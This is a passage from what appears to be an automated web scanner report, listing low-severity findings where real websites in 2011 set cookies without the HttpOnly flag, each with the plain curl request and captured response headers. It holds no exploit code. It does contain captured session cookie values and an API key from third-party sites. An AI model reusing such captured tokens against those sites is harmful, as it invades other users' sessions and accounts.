Set-Cookie: ning_session=hYUinaZPS4PpTu5L6SBL+6WnXz1ReXkZONMjZKkPvji77oXBafO3wf3mrh+eSamL2/SqG6uHda4=;Path=/;Domain=.thisis50.com;Expires=Sat, 02-Apr-11 15:10:19 GMT
X-XN-Trace-Token: a9fbec7b-7dd0-41ce-b9e7-d77a0f275cdc
ETag: "84997-483-45a8520a9ed00"
Date: Sat, 02 Apr 2011 14:09:47 GMT
Date: Sat, 02 Apr 2011 14:09:47 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 31 Oct 2008 04:35:32 GMT
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: image/x-icon
Accept-Ranges: bytes
Server: Ning HTTP Server 2.0
Content-Length: 1155

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...
14.33. http://www.travel-ticker.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.travel-ticker.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travel-ticker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FB9835EB71FFEAA1AA9FFE640CE8E63; Path=/
Set-Cookie: SaneID=2FB9835EB71FFEAA1AA9FFE640CE8E6; Expires=Sun, 06-Mar-2016 14:16:40 GMT; Path=/
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 14:16:40 GMT
Set-Cookie: NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c3045525d5f4f58455e445a4a422d69;path=/;httponly
Content-Length: 102294


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta name="robots" content="noindex, nofollow">

<link rel="stylesheet" href="
...[SNIP]...
14.34. http://www.usajobs.gov/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usajobs.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usajobs.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10861
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSCBQRCBB=MGJGMMNCLOGHNJBKECBCECPF; path=/
Date: Sat, 02 Apr 2011 13:35:33 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-US" dir="ltr">
<head>
<title>USAJOBS - Page Not Found</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
14.35. http://www.verizon.net/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.verizon.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verizon.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12346
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:47 GMT
Connection: close
Set-Cookie: ASPSESSIONIDACTBSRTC=NNIKMLGDFJLLCPKHOIDHPHBF; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
   <title>Verizon Online - Page Not Found</title>
   <meta http-equi
...[SNIP]...
14.36. http://www.websitealive.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.websitealive.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.websitealive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9592
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDCSBSCDBC=MAKNBCJDCBAEBCFJJAGGECIK; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/
...[SNIP]...
14.37. http://www.wellness.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wellness.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:48 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
Content-Length: 50558
Content-Type: text/html
Cache-Control: private
Set-Cookie: WWFLV=LV=2011%2D4%2D2+6%3A33%3A48; expires=Mon, 02-Apr-2012 13:33:48 GMT; path=/
Set-Cookie: ASPSESSIONIDACQCTCRD=BJAKHBHDIHGAFFDGECCKGLMB; path=/
X-Cache: MISS from squid1.earnware.corp
X-Cache-Lookup: MISS from squid1.earnware.corp:80
Via: 1.0 wellness.com, 1.0 squid1.earnware.corp (squid)
Connection: close

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>The pursuit of health and happiness - 404 Not Foun
...[SNIP]...
14.38. http://www.wendys.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wendys.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wendys.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:21:04 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301754064.692481; expires=Tue, 30-Mar-2021 14:21:04 GMT; path=/
Cache-Control: no-cache="Set-Cookie"
Content-Length: 17168
Set-Cookie: JSESSIONID=LcGjNXwbjjyX5TMBb6LvJJ2GQryf2GG2hgTwfwlShqp5tyGp3qkq!2031274302!-998707752; path=/
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpool-x-www.wendys.com=784924426.4391.0000; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...
14.39. http://www.windows.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.windows.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.windows.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 23
Content-Type: text/html
Location: http://www.microsoft.com/windows/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAARACQBT=HHGJNAECBBBHPMMEAGHKBEJM; path=/
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 02 Apr 2011 12:37:54 GMT
Connection: close

<!--TOOLBAR_EXEMPT-->
14.40. http://www.worthpoint.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.worthpoint.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worthpoint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: wp_session=173.193.214.243.1301751474503452; path=/; domain=.worthpoint.com
Last-Modified: Mon, 13 Apr 2009 18:38:55 GMT
ETag: "17b85c4-13e-4677406cfedc0"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ................................*?..6Q..Tr..o..#...,...3...f...@...T...>...>...f...J......................UU1....6........8c.R..<.. <....b.......0"...A..!R.B.p...B.aL`..
...[SNIP]...
14.41. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&sensor=false&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sfgdata=+sfgRmluamFuX1R5cGU9amF2YV9zY3JpcHQmRmluamFuX0xhbmc9dGV4dC9qYXZhc2NyaXB0+a HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752060:GM=1:IG=3:SG=1:S=pQ1PkWLa_0C6rZC1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x; expires=Mon, 01-Apr-2013 13:57:29 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:57:29 GMT
Server: mfe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Sat, 02 Apr 2011 13:57:29 GMT
Content-Length: 11871

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...
14.42. http://maps.google.com/maps/gen_204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/gen_204

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/gen_204?imp=maps_api_set_default_ui HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x

Response

HTTP/1.1 204 No Content
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752651:GM=1:IG=3:SG=1:S=mnR2BkyBhZFvD7WE; expires=Mon, 01-Apr-2013 13:57:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:57:31 GMT
Server: mfe
Content-Length: 0
X-XSS-Protection: 1; mode=block

14.43. http://maps.google.com/maps/vp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/vp?spn=0.048799,0.102997&z=13&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sensor=false&mapclient=jsapi&vp=50.82267,-0.14441 HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:31 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752651:GM=1:IG=3:SG=1:S=mnR2BkyBhZFvD7WE; expires=Mon, 01-Apr-2013 13:57:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 1332

GAddCopyright("m","11605834097857221387",50.7983,-0.1959,50.8471,-0.0929,13,"Tele Atlas",19,false);
window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:50889174,w:-285645,n:50903033,e:-153809,i
...[SNIP]...
14.44. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=10.0.648.204&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301746656:GM=1:IG=3:SG=1:S=-7aZMRhsTdHlesaT
Content-Length: 104

goog-malware-shavar;a:28068-35165:s:40805-47673:mac
goog-phish-shavar;a:130630-134965:s:67129-68856:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748493:GM=1:IG=3:SG=1:S=dU5RHSbYxFO9H3Ys; expires=Mon, 01-Apr-2013 12:48:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:48:13 GMT
Server: Chunked Update Server
Content-Length: 369
X-XSS-Protection: 1; mode=block
Expires: Sat, 02 Apr 2011 12:48:13 GMT
Cache-Control: private

m:sDWcvq3SwCNj5QAXb_7v9pezsYg=
n:1772
i:goog-malware-shavar
i:goog-phish-shavar
ad:130630-130632
u:safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchABGPiZBCD8mQQqBfoMAQAHMgX4DAE
...[SNIP]...
14.45. http://smp.adviva.net/track/v=4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /track/v=4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track/v=4;m=1;t=7841;ts=%3Ctimestamp_here%3E HTTP/1.1
Host: smp.adviva.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2178764;type=newkc987;cat=kcomh345;ord=1;num=2714251752477.139?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ansv4_uid=0.0; ansv4_trackers=eJxjZWdmYGBgYmECksxcXIbGBgZmJmYGhqZwtqGZGUcTUJbF0NDUnBh1Jsbm5gCm5Asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: WebStar 1.0
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://cache.adviva.net/creative/blank.gif
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-GB
Content-Length: 192
Set-Cookie: ug=a1GYlFHurBKxyC; Domain=.eu.specificmedia.com; Expires=Thu, 31-Mar-2016 13:57:10 GMT; Path=/
Connection: close

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://cache.adviva.net/creative/blank.gif">here</a>.<p>
</body>
</html>
14.46. http://translate.google.com/translate_a/element.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_a/element.js?cb=cr.googleTranslate.onTranslateElementLoad HTTP/1.1
Host: translate.google.com
Proxy-Connection: keep-alive
Google-Translate-Element-Mode: library
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748493:GM=1:IG=3:SG=1:S=dU5RHSbYxFO9H3Ys

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:48:39 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Pragma: no-cache
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748519:GM=1:IG=3:SG=1:S=BBZNQWKju3cJJqSO; expires=Mon, 01-Apr-2013 12:48:39 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1422

(function(){var d=window,e=document;function f(b){var a=e.getElementsByTagName("head")[0];a||(a=e.body.parentNode.appendChild(e.createElement("head")));a.appendChild(b)}function _loadJs(b){var a=e.cre
...[SNIP]...
14.47. http://www.2wire.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2wire.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2wire.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:25:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 20 Oct 2010 20:38:29 GMT
ETag: "1d0bd-47e-64579b40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TwoWireLB=3217371914.20480.0000; path=/

............ .h.......(....... ..... .........................x(..x(..x(..x(..x(...mR..9..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..~2.......pU.x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(
...[SNIP]...
14.48. http://www.411.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.411.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.411.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:42:01 GMT
Status: 200 OK
X-Runtime: 0.02831
ETag: "28868ff376e29e9093907243f62f8121"
Connection: keep-alive
Set-Cookie: wp_endemic_provider=A; domain=.411.com; path=/; expires=Sun, 03 Apr 2011 01:42:01 GMT
Set-Cookie: wp_perm=pid%3D_LLdoF0uEeCxcgAeC-lzfg; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: _wpn_sid=7494deac6a51f7c62e310ec573d0b582; domain=.411.com; path=/
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
14.49. http://www.4shared.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=435176162; Expires=Tue, 30-Mar-2021 13:24:08 GMT; Path=/
ETag: W/"1150-1295252940000"
Last-Modified: Mon, 17 Jan 2011 08:29:00 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:24:08 GMT

............ .h.......(....... ..... ....................................................................
............................................................sT..oQ.....4...................
..
...[SNIP]...
14.50. http://www.aarp.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aarp.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aarp.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:11 GMT
Server: Apache
Last-Modified: Sat, 02 Apr 2011 11:07:34 GMT
Accept-Ranges: bytes
Content-Length: 1406
NodeID: ws6-md.aarp.net
Cache-Control: no-cache
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerwww-md.aarp.org=2887690432.20480.0000; path=/

..............h.......(....... ...............................%2..........nw......6B..CO..........|...................Wa..w~............................................................................
...[SNIP]...
14.51. http://www.aboutus.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aboutus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:42:58 GMT
Content-Type: image/x-icon
Content-Length: 1406
Last-Modified: Tue, 15 Feb 2011 01:07:35 GMT
Connection: close
X-node-id: columbia
Accept-Ranges: bytes
Set-Cookie: SERVERID=columbia; path=/

